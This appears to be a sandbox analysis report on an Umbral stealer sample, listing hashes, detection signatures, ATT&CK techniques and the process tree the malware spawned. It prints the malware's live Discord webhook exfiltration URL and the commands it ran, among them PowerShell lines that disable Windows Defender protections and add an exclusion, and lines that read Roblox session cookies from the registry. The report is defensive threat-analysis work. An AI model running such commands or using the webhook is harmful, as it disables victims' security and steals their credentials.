umbral | 8c36c4018ed237ae9c5b285c4f7b079bf53621e130a2eeacb9c4cb6d377f8026

Analysis

max time kernel
10s
max time network
60s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
05-11-2023 03:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ConsoleApplication1_protected.exe
Size

24.9MB
MD5

c92b3adc71593399adca81dc7b695f07
SHA1

4265756d847c8f47649c615105be4e51454c4a25
SHA256

8c36c4018ed237ae9c5b285c4f7b079bf53621e130a2eeacb9c4cb6d377f8026
SHA512

02bafa5fb89486bbe013afe7f45178e58b399ba5b6efce2e472f9f92cc33f40caffd4c4c09f5649a97343bdc1c7b823fbbc71e2e4220c5debab0e45aab5e2cbd
SSDEEP

786432:JuuEgy4SMkw587wn9+xzCaH6iglrEV1MThSKvHQ/Y713:eJ4SM12kK6/l1tSMiYJ3

Score

10^/10

umbral evasion stealer themida trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1170536634891128902/hdNxkvpSxRXfW2ouud2imDE8eFbcAfoi3fBBxpcoRyxI8E-rxHT7NHLuI-Q-ThYq7M3H

Signatures

Detect Umbral payload 9 IoCs

resource	yara_rule
behavioral1/memory/3168-3-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	family_umbral
behavioral1/memory/3168-4-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	family_umbral
behavioral1/memory/3168-5-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	family_umbral
behavioral1/memory/3168-6-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	family_umbral
behavioral1/files/0x0007000000022e15-15.dat	family_umbral
behavioral1/files/0x0007000000022e15-14.dat	family_umbral
behavioral1/memory/2620-16-0x000001F238A80000-0x000001F238AC0000-memory.dmp	family_umbral
behavioral1/memory/3168-52-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	family_umbral
behavioral1/memory/3168-131-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ConsoleApplication1_protected.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ConsoleApplication1_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ConsoleApplication1_protected.exe

Executes dropped EXE 2 IoCs

pid	Process
3564	pWrXcaOrNjhzrAdawJLoqy7JDvnYe6EB.exe
2620	Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/3168-1-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida
behavioral1/memory/3168-2-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida
behavioral1/memory/3168-3-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida
behavioral1/memory/3168-4-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida
behavioral1/memory/3168-5-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida
behavioral1/memory/3168-6-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida
behavioral1/memory/3168-52-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida
behavioral1/memory/3168-131-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ConsoleApplication1_protected.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
40	ip-api.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Speech\pWrXcaOrNjhzrAdawJLoqy7JDvnYe6EB.exe	ConsoleApplication1_protected.exe
File created	C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe	ConsoleApplication1_protected.exe
File opened for modification	C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe	attrib.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3168	ConsoleApplication1_protected.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5024	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2472	PING.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2620	Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe
Token: SeDebugPrivilege	1560	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 3168 wrote to memory of 3564	3168	ConsoleApplication1_protected.exe	91
PID 3168 wrote to memory of 3564	3168	ConsoleApplication1_protected.exe	91
PID 3168 wrote to memory of 3564	3168	ConsoleApplication1_protected.exe	91
PID 3168 wrote to memory of 2620	3168	ConsoleApplication1_protected.exe	97
PID 3168 wrote to memory of 2620	3168	ConsoleApplication1_protected.exe	97
PID 3168 wrote to memory of 4956	3168	ConsoleApplication1_protected.exe	95
PID 3168 wrote to memory of 4956	3168	ConsoleApplication1_protected.exe	95
PID 2620 wrote to memory of 2468	2620	Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe	98
PID 2620 wrote to memory of 2468	2620	Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe	98
PID 2620 wrote to memory of 1560	2620	Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe	101
PID 2620 wrote to memory of 1560	2620	Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe	101

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2468	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1_protected.exe
"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1_protected.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:3168
- C:\Windows\System32\Speech\pWrXcaOrNjhzrAdawJLoqy7JDvnYe6EB.exe
  C:\Windows\System32\Speech\pWrXcaOrNjhzrAdawJLoqy7JDvnYe6EB.exe
  2⤵
  - Executes dropped EXE
  PID:3564
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=pWrXcaOrNjhzrAdawJLoqy7JDvnYe6EB.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
    3⤵
    PID:4324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6e5046f8,0x7ffd6e504708,0x7ffd6e504718
      4⤵
      PID:2908
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,7518557759410603246,901586525538990639,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
      4⤵
      PID:1608
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,7518557759410603246,901586525538990639,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
      4⤵
      PID:2568
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,7518557759410603246,901586525538990639,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8
      4⤵
      PID:1020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7518557759410603246,901586525538990639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
      4⤵
      PID:4468
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7518557759410603246,901586525538990639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
      4⤵
      PID:2464
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7518557759410603246,901586525538990639,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
      4⤵
      PID:4424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause
  2⤵
  PID:4956
- C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe
  C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe"
    3⤵
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    PID:2572
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2812
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:568
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:1512
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5024
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe" && pause
    3⤵
    PID:4844
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2472

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5084

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
8dcc334bf93d6ec90eff54dd15ebd064

SHA1
29cf48f9f560d49ec2e176a273dfa144729a5ef2

SHA256
e1656ac891e88a824a1fb209ec34f1a3dd9c9447930a1336a4d21f8b35816191

SHA512
431fd7bc07b9e48955b865a4716e7f67df8ba52d4121203e0c51463bc9d3203ba6ebca2c91a02cffece6498729d391c5341a6f59c50a5bea6455d83202153b8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
346B

MD5
6ece3f5cd607baade0356830e03e17f9

SHA1
d5815c6344022639fad72bb7a51e7c29e9ceeb0f

SHA256
791bdba025d75c7cc21501fe22d68078fd880275a6bc5a136d903e389e4ea917

SHA512
89d6587d9d7b50f4bb3effd4691ecf2a0e2e2f4da0a64cf57527235588afc956d0d46a69ff93f610ec232faa320188796f3ee3b34771ee2f854739daf892524c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cfc7d8093f094f058fb16376774873a8

SHA1
6a7a3065c2c55d51989c420e6d832fd52df04d53

SHA256
8487156c45d675260cb6e0383989ab2f3fbe9ea2eedbaf244610ba37c7e21a7a

SHA512
e3a705c88dc37a2f2394f09bb8d24ff97cd3823150bdc072e5117627bb80e711110202eb283ca803947997d8ba2b8f15bb6102e48d51026e86ff9746a2e794c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ff88744f05a8012260f82fa02b552a08

SHA1
3286924f3b34ff4b8955d55d681c9362cd882db4

SHA256
d00006aa728823eb7d8b002aa7cb345dc58e5d4f47c358fda23a8cef2fe79ee6

SHA512
b4c9aa29051695c7b126a8a33992f7b9877b08fc8c50a187ebe8af5324a04f773f81c60d2b20dc7f71fe7e1129601c58f5e2bb1ad881260145808966e091fd0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
0b33077e58040378790f1edc663d8c71

SHA1
31aa2f10666bcbb9b73f604b04982b6654d968b2

SHA256
694412176e7bbf4481ac49b239745dc7bbbff077d1e758f6116ba61b156ca39d

SHA512
34ae924f3307d6d60eb3a3a322b169517c908874011cad17c72eb3bc9352feb38c05913d38719a9b4f4dae740d98cbe0268a0f278d0f86c05b55f5eccf9cdd8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
2cdc7a60f9da3123b0751a3b3deaac38

SHA1
7e9c928b4529b95affb0c522c7cb83c5dcacfaae

SHA256
5c784d29f5c665abaa39966752df96b8eee31b2a3670c5be1f5d51602dafa920

SHA512
dce0036f4fd248dae358ae7d8ce13670598b2d234296a9cf620a406f39c4a344d3adf5c1fe6283ea33ef15dca5266771d6edf1a2d5b899fbb95c816b3081620a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
be7dfdb4b69a9915ae608bfc332ee517

SHA1
546bb51615e64e4d2c6b761e9d70f7c13c067884

SHA256
8babd28009fa6a44a8263043a0ac63997212a6e2311efd339d2be7d3e473434f

SHA512
674c32be8e15916f4877944a1859866b36cb67f95421b9369bb70b28ebb5ea5f50870a20910a67f39b9384f2c967a491244e6bb2590760fc712934ecb26b84c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
2af06a6b36db9473e4a7d9c7ab72b70b

SHA1
8ef34b9b961e51bdd1b8d7d9db2ec1b0a4764645

SHA256
18a2aa7e245c6732f95fb7749b2b4d29007f2c56a9c5bfbc5e3c127bdfe5f158

SHA512
3495567a5d5af94ae27be51313d9e2630c52017d808042fe0d56baa34fa1d246eb15c253d14c77c77a1d8f2f1c81680e623044ae95415b095696e7fa141ac7cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqnhmxi5.i35.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe

Filesize
227KB

MD5
ef2711e9aeeb23297016ef32b46a3c7e

SHA1
ba51f478c1118d7803620367cb97ce2ceba52a5a

SHA256
2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759

SHA512
3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f

Download Submit
C:\Windows\System32\Speech\Pdof71P8R225ifl2wDcvTec3ZLoSf1JF.exe

Filesize
227KB

MD5
ef2711e9aeeb23297016ef32b46a3c7e

SHA1
ba51f478c1118d7803620367cb97ce2ceba52a5a

SHA256
2fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759

SHA512
3c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f

Download Submit
C:\Windows\System32\Speech\pWrXcaOrNjhzrAdawJLoqy7JDvnYe6EB.exe

Filesize
11KB

MD5
cebf7458dceffcbb81a290cf045beb27

SHA1
98c74fa610995d61d2ee78a2ea888e003e9f436d

SHA256
97d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660

SHA512
144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/636-85-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/636-64-0x00000239E7CE0000-0x00000239E7CF0000-memory.dmp

Filesize
64KB

Download
memory/636-63-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/1512-115-0x00000218F73E0000-0x00000218F73F0000-memory.dmp

Filesize
64KB

Download
memory/1512-113-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/1512-121-0x00000218F73E0000-0x00000218F73F0000-memory.dmp

Filesize
64KB

Download
memory/1512-120-0x00000218F73E0000-0x00000218F73F0000-memory.dmp

Filesize
64KB

Download
memory/1512-123-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/1560-21-0x0000021321F70000-0x0000021321F80000-memory.dmp

Filesize
64KB

Download
memory/1560-19-0x000002133A350000-0x000002133A372000-memory.dmp

Filesize
136KB

Download
memory/1560-20-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/1560-33-0x0000021321F70000-0x0000021321F80000-memory.dmp

Filesize
64KB

Download
memory/1560-32-0x0000021321F70000-0x0000021321F80000-memory.dmp

Filesize
64KB

Download
memory/1560-36-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2572-101-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2572-96-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2572-97-0x00000161DAC50000-0x00000161DAC60000-memory.dmp

Filesize
64KB

Download
memory/2572-99-0x00000161DAC50000-0x00000161DAC60000-memory.dmp

Filesize
64KB

Download
memory/2572-98-0x00000161DAC50000-0x00000161DAC60000-memory.dmp

Filesize
64KB

Download
memory/2620-60-0x000001F2531A0000-0x000001F2531F0000-memory.dmp

Filesize
320KB

Download
memory/2620-129-0x000001F2532C0000-0x000001F253469000-memory.dmp

Filesize
1.7MB

Download
memory/2620-130-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2620-18-0x000001F253090000-0x000001F2530A0000-memory.dmp

Filesize
64KB

Download
memory/2620-62-0x000001F253090000-0x000001F2530A0000-memory.dmp

Filesize
64KB

Download
memory/2620-61-0x000001F2532A0000-0x000001F2532BE000-memory.dmp

Filesize
120KB

Download
memory/2620-59-0x000001F253220000-0x000001F253296000-memory.dmp

Filesize
472KB

Download
memory/2620-17-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2620-103-0x000001F23A720000-0x000001F23A72A000-memory.dmp

Filesize
40KB

Download
memory/2620-104-0x000001F2531F0000-0x000001F253202000-memory.dmp

Filesize
72KB

Download
memory/2620-107-0x000001F2532C0000-0x000001F253469000-memory.dmp

Filesize
1.7MB

Download
memory/2620-16-0x000001F238A80000-0x000001F238AC0000-memory.dmp

Filesize
256KB

Download
memory/2620-54-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2916-39-0x0000029346B60000-0x0000029346B70000-memory.dmp

Filesize
64KB

Download
memory/2916-55-0x0000029346B60000-0x0000029346B70000-memory.dmp

Filesize
64KB

Download
memory/2916-56-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2916-38-0x00007FFD6C5F0000-0x00007FFD6D0B1000-memory.dmp

Filesize
10.8MB

Download
memory/2916-51-0x0000029346B60000-0x0000029346B70000-memory.dmp

Filesize
64KB

Download
memory/2916-45-0x0000029346B60000-0x0000029346B70000-memory.dmp

Filesize
64KB

Download
memory/3168-132-0x00007FFD8BC10000-0x00007FFD8BE05000-memory.dmp

Filesize
2.0MB

Download
memory/3168-131-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download
memory/3168-52-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download
memory/3168-0-0x00007FFD8BC10000-0x00007FFD8BE05000-memory.dmp

Filesize
2.0MB

Download
memory/3168-31-0x00007FFD8BC10000-0x00007FFD8BE05000-memory.dmp

Filesize
2.0MB

Download
memory/3168-6-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download
memory/3168-5-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download
memory/3168-4-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download
memory/3168-3-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download
memory/3168-2-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download
memory/3168-1-0x00007FF7431F0000-0x00007FF74737F000-memory.dmp

Filesize
65.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads